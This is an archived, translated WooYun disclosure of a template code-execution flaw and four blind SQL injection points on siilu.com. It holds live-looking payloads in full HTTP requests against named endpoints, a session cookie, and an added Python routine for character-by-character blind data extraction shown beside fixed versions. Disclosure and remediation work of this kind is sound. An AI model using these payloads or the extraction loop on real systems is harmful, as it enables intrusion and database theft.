
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-020097

Title: Code execution vulnerability and blind SQL injection on a website of 亿邦动力网

Vendor: 亿邦动力网

Author: lucky

Submitted: 2013-03-15 14:35

Fixed: 2013-04-29 14:36

Published: 2013-04-29 14:36

Vulnerability type: command execution

Severity: high

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-03-15: Details sent to the vendor, awaiting the vendor's response
2013-03-19: Vendor confirmed; details visible to the vendor only
2013-03-29: Details disclosed to core white hats and relevant domain experts
2013-04-08: Details disclosed to regular white hats
2013-04-18: Details disclosed to intern white hats
2013-04-29: Details disclosed to the public

Brief description:

Code execution vulnerability on a website of 亿邦动力网

Detailed description:

Code execution vulnerability:

http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d

The last path segment URL-decodes to ${@print(md5(admin))}, a template expression. In PHP the bare word admin is treated as the string "admin", so if the server evaluates the expression the response body contains 21232f297a57a5a743894a0e4a801fc3, the MD5 of "admin"; if the segment is echoed back literally, nothing was evaluated.

[Screenshot: 9.PNG]

[Screenshot: 10.PNG]
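The probe above only yields code execution when two things hold: the application lets the URL path reach the template engine as template source, and the engine evaluates whatever sits between ${ and } as code. The following Python model is an added example, not the site's code (which is PHP and not shown on this page); the build_case_page concatenation, the md5 helper exposed to the template, and the context values are assumptions made for the illustration. It shows the vulnerable rendering next to a rendering that treats ${name} as a plain variable lookup, together with the canary check a tester uses to tell the two apart.

```python
import hashlib
import html
import re

# Matches a ${...} template expression, the same syntax as the probe in the report.
TEMPLATE_EXPR = re.compile(r"\$\{(.+?)\}")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def build_case_page(path_segment: str) -> str:
    # Assumed flaw (hypothetical, for illustration only): the last path segment of
    # /shop/<id>/infocase/<segment> is concatenated into the template source
    # before the template engine runs, so URL input becomes template code.
    return "<h1>Case: " + path_segment + "</h1><p>shop ${shop_id}</p>"


def vulnerable_render(template_src: str, ctx: dict) -> str:
    # Evaluates whatever sits between ${ and } as code. Combined with
    # build_case_page this is code execution straight from the URL.
    def evaluate(match):
        # The tiny eval namespace is NOT a fix; it only keeps the demo self-contained.
        return str(eval(match.group(1), {"__builtins__": {}, "md5": md5_hex}, dict(ctx)))
    return TEMPLATE_EXPR.sub(evaluate, template_src)


def safe_render(template_src: str, ctx: dict) -> str:
    # ${name} is a lookup of a plain identifier in ctx, HTML-escaped on output.
    # Anything else between the braces is data: it is dropped, never evaluated.
    def lookup(match):
        name = match.group(1).strip()
        if re.fullmatch(r"[A-Za-z_]\w*", name) and name in ctx:
            return html.escape(str(ctx[name]))
        return ""
    return TEMPLATE_EXPR.sub(lookup, template_src)


def canary_executed(response_body: str, canary: str = "admin") -> bool:
    # The check behind the report's probe: the MD5 of a known string appears in
    # the body only if the server actually evaluated md5(...).
    return md5_hex(canary) in response_body


# Python-syntax counterpart of the page's ${@print(md5(admin))} probe.
PAYLOAD = "${md5('admin')}"
CTX = {"shop_id": 100501}  # constructed context value


def demo() -> dict:
    vuln = vulnerable_render(build_case_page(PAYLOAD), CTX)
    safe = safe_render(build_case_page(PAYLOAD), CTX)
    return {
        "vulnerable": vuln,
        "safe": safe,
        "vulnerable_executed": canary_executed(vuln),
        "safe_executed": canary_executed(safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The real fix is both halves of safe_render at once: untrusted text must never be compiled as template source, and the engine must not hand expression text to an evaluator. Restricting lookups alone still leaves the concatenation in build_case_page as a latent problem if the engine is ever upgraded to support richer expressions.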


Blind SQL injection (the report counts three; four injection points follow):

POST /companyuser/dob2b, field user_name: time-based. The value closes the string literal and appends sleep(2), so a response delayed by roughly two seconds confirms that the database executed it.
GET /index/clue, parameter clueid: boolean-based in a numeric context (-1 or 11=11 is the always-true branch; compare against an always-false variant such as 11=12).
GET /product/topcategory/, parameter category_id: boolean-based in a string context; the payload closes the quote first (-1' or '91'='92, the false branch).
GET /ques/getfaq/, parameter quesid: boolean-based in a numeric context (-1 or 100=98, the false branch).

POST /companyuser/dob2b HTTP/1.1
Content-Length: 1540
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="city"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="company_site"
Acunetix
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="mail"
sample@email.tst
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass2"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass_word"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone1"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="province"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="qq"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="telphone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="usertype"
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="user_name"
kgoyghag' or (sleep(2)+1) limit 1 --
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="__hash__"
54c0fa6632d2db7653113cafae62bb45
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="logo"; filename=""
Content-Type:
-------AcunetixBoundary_IXNSIQEDQH--


[Screenshot: 11.PNG]


http://www.siilu.com/index/clue?clueid=-1%20or%2011=11


[Screenshot: 12.PNG]

[Screenshot: 13.PNG]


GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*


GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
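A boolean oracle such as clueid=-1 or 11=11 is rated high because it is not just a yes/no leak: a few hundred automated requests turn it into a dump of any value the database user can read. The Python example below is added here and is not the site's code; it uses an in-memory SQLite stand-in with a constructed schema and rows (the real schema is not on the page), so the page's MySQL sleep(2) is not available and the time-based variant is described in prose instead. It models the /index/clue?clueid= lookup as string concatenation, runs the report's true/false pair against it, extracts a row character by character through the oracle, and shows the same extraction failing against a type-checked, parameterised lookup.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the site's database. Table and column
    # names, and the rows, are invented for the demo (assumption, not the real schema).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE clue (clueid INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, user_name TEXT, pass_word TEXT);
        INSERT INTO clue VALUES (1, 'first clue'), (2, 'second clue');
        INSERT INTO users VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return db


def clue_exists_vulnerable(db: sqlite3.Connection, clueid: str) -> bool:
    # Models /index/clue?clueid=...: the parameter is pasted into the SQL text,
    # so "-1 or 11=11" turns an always-false lookup into an always-true one.
    sql = "SELECT title FROM clue WHERE clueid=" + clueid
    return db.execute(sql).fetchone() is not None


def clue_exists_safe(db: sqlite3.Connection, clueid: str) -> bool:
    # Type-check first, then bind: the value never becomes part of the SQL text.
    try:
        cid = int(clueid)
    except ValueError:
        return False
    row = db.execute("SELECT title FROM clue WHERE clueid=?", (cid,)).fetchone()
    return row is not None


def extract_with_oracle(oracle, expr: str, max_len: int = 64) -> str:
    # Boolean-blind extraction. `oracle(payload)` answers True/False for one
    # request (here: "did the page show a clue?"). Each character of the scalar
    # subquery `expr` is recovered by a binary search over its code point,
    # about seven oracle calls per character plus one length probe.
    # With a time-based point (the user_name field above) the loop is the same;
    # the oracle just becomes "did the response take >= 2 s?".
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"-1 or length(({expr}))>={pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"-1 or unicode(substr(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


# The value an attacker would go after through the oracle (constructed row).
ADMIN_HASH_QUERY = "SELECT pass_word FROM users WHERE user_name='admin'"


def demo() -> dict:
    db = build_db()

    def vulnerable(payload: str) -> bool:
        return clue_exists_vulnerable(db, payload)

    def safe(payload: str) -> bool:
        return clue_exists_safe(db, payload)

    return {
        # the report's probe and its always-false counterpart
        "vuln_true": vulnerable("-1 or 11=11"),
        "vuln_false": vulnerable("-1 or 11=12"),
        "safe_true_payload": safe("-1 or 11=11"),
        "safe_real_id": safe("1"),
        "dumped_via_vulnerable": extract_with_oracle(vulnerable, ADMIN_HASH_QUERY),
        "dumped_via_safe": extract_with_oracle(safe, ADMIN_HASH_QUERY),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

For the string-context point (category_id=-1' or '91'='92) the same loop applies with a leading quote to close the literal and the comparison written so the closing quote supplied by the application still balances; the numeric points need no quoting at all, which is why a bare -1 or 11=11 works there.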


Proof of vulnerability:

(Identical to the request captures and screenshots given under the detailed description above.)


Fix recommendation: (left blank by the author)

Copyright notice: when reposting, credit the source: lucky@乌云 (WooYun)


Vendor response

Vendor response:

Severity: medium

Vulnerability rank: 6

Confirmed: 2013-03-19 12:58

Vendor reply:

Thanks, lucky

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2013-03-16 11:30 | wefgod (Regular white hat | Rank: 1807, vulnerabilities: 179 | tagline: running out of steam)

    Two of mine never even got reviewed. I later found three serious issues on it and now can't be bothered to submit them, in case they get ignored again and the effort is wasted.

  2. 2013-03-17 13:19 | lucky (Regular white hat | Rank: 409, vulnerabilities: 84 | tagline: among any three people walking, one is my teacher########################...)

    @wefgod Hold on to them; submit once the vendor has confirmed, heh!

  3. 2013-03-18 10:33 | wefgod (Regular white hat | Rank: 1807, vulnerabilities: 179 | tagline: running out of steam)

    @lucky It's WooYun that isn't reviewing them, not that 长沙 (Changsha) isn't confirming.

  4. 2013-03-18 10:33 | wefgod (Regular white hat | Rank: 1807, vulnerabilities: 179 | tagline: running out of steam)

    "Vendor", typo, pinyin is a pain.

  5. 2013-03-18 10:46 | lucky (Regular white hat | Rank: 409, vulnerabilities: 84 | tagline: among any three people walking, one is my teacher########################...)

    @wefgod Got it! I also have some stuck in review that never get through! Frustrating! Sigh...

  6. 2013-03-18 15:39 | wefgod (Regular white hat | Rank: 1807, vulnerabilities: 179 | tagline: running out of steam)

    @lucky Generally once 3 to 5 days have passed, the chance of it being reviewed is basically gone.